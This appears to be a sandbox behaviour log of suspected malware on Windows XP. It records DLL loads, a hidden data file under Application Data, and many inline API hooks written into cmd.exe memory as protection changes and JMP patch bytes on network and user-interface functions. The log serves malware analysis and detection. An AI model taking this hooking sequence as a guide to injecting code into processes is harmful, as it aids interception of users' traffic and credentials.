Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 9A0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2004105954
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2004128523
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2004132661
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 470000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2004170319
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 470000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004174590
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 470000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004178539
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2004203984
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 9A0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2004232693
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 9A0000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 2004274294
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2004275983
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2004285940
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2004288294
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2004296844
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2004297542
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2004298941
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2004299663
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2004321190
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 9A0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2004343262
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2004360124
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2004383189
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2004489685
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2004490209
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: BD0000 Length: 13F6B0 Allocation Type: null Protection: page read and write success or wait 2004492325
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: BD0000 Length: 13F6B4 Allocation Type: null Protection: page read and write success or wait 2004492428
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2004521411
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2004521679
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2004521887
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2004522091
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2004522294
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004522539
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004522753
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004522966
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004523178
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004523390
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004523600
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004523813
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004524024
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2004524236
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2004524448
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 13F484 Allocation Type: null Protection: page execute and read and write success or wait 2004524724
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2004525108
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2004525217
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004525330
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004525434
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 CB 7B success or wait 2004525565
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2004525677
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2004525784
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 83 83 success or wait 2004525912
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2004526027
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2004526401
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2004526506
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004526617
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004526724
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 CC 7B success or wait 2004526855
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2004526951
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2004527057
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 5 Value: E9 94 27 83 83 success or wait 2004527184
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2004527297
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2004527708
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2004527814
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004527925
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004528031
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 BC 7B success or wait 2004528162
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2004528257
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2004528364
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 5 Value: E9 CE 79 93 83 success or wait 2004528490
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2004528603
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2004529187
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2004529292
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004529422
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004529528
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA CF 3C success or wait 2004529659
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2004529754
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2004529860
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 5 Value: E9 97 45 80 C2 success or wait 2004529986
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2004530100
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2004530628
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2004530733
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004530861
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004530967
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE D0 3C success or wait 2004531096
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 7F C2 success or wait 2004531472
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2004531995
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004532264
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 D6 3C success or wait 2004532333
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 79 C2 success or wait 2004532710
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2004533155
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004533371
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 D6 3C success or wait 2004533500
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 79 C2 success or wait 2004533827
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2004534654
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004534920
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 CF 3C success or wait 2004535071
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D949088 Length: 5 Value: E9 AD B1 80 C2 success or wait 2004535401
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2004536212
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004536445
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 CF 3C success or wait 2004536575
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94654B Length: 5 Value: E9 2D DD 80 C2 success or wait 2004536904
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2004537626
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004537860
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 D1 3C success or wait 2004537990
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D963381 Length: 5 Value: E9 36 0F 7F C2 success or wait 2004538317
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2004539110
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004539343
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF CF 3C success or wait 2004539472
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 80 C2 success or wait 2004539800
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2004540594
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004540825
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C5006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 CF 3C success or wait 2004540954
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 80 C2 success or wait 2004541280
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2004541648
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004541881
Memory written PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D E6 70 success or wait 2004542009
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2004542700
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004542932
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2004543748
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004543964
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2004545008
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004545200
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2004546440
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004546677
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2004547683
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004547916
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2004548904
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004549136
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2004550143
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004550375
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2004551301
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004551531
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2004552500
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004552733
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2004553616
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004553835
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2004554807
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004555023
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2004555887
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004556104
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2004557070
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004557302
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2004558282
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004558497
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2004559489
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004559703
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2004560672
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004560902
Memory read PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 2004561915
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004562131
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004563335
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004564556
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004565739
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004566981
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004568472
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004569695
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004571007
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004572186
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004573388
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004574591
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004575767
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004576844
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004578033
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004579197
